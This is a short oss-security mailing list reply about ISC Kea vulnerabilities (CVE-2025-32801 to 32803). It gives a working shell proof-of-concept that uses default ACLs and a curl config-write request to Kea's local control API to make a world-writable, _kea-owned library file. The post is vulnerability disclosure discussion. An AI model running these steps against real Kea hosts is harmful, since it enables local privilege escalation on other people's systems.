Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [day] [month] [year] [list] 
Message-ID: <20250528182325.yuupynsufybqvea3@jwilk.net>
Date: Wed, 28 May 2025 20:23:25 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Re: ISC has disclosed three vulnerabilities in Kea
 (CVE-2025-32801, CVE-2025-32802, CVE-2025-32803)

* Matthias Gerstner <mgerstner@...e.de>, 2025-05-28 19:21:
>By leveraging issue 3.2), the Kea services can be instructed to create 
>`_kea` owned files in the attacker's `$HOME/.Private`. The content of 
>the created files is not fully attacker controlled, however, so it will 
>not be possible to craft a valid ELF object for loading via `dlopen()` 
>this way. By placing a setgid-directory in `$HOME/.Private/evil-dir`, 
>any files created in this directory will even have the group-ownership 
>of the attacker. The file mode will be 0644, however,

Default ACLs to the rescue!

$ chmod a+x ~
$ mkdir -m 777 ~/.Private
$ setfacl -d -m u:$LOGNAME:rwx ~/.Private/
$ curl -s -H "Content-Type: application/json" -d '{ "command": "config-write", "arguments": { "filename": "'"$HOME"'/.Private/libexploit.so" } }' localhost:8000 > /dev/null
$ echo pwned > ~/.Private/libexploit.so
$ ls -l ~/.Private/libexploit.so
-rw-rw-rw-+ 1 _kea _kea 6 May 28 18:15 /home/jwilk/.Private/libexploit.so
$ cat ~/.Private/libexploit.so
pwned

-- 
Jakub Wilk

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.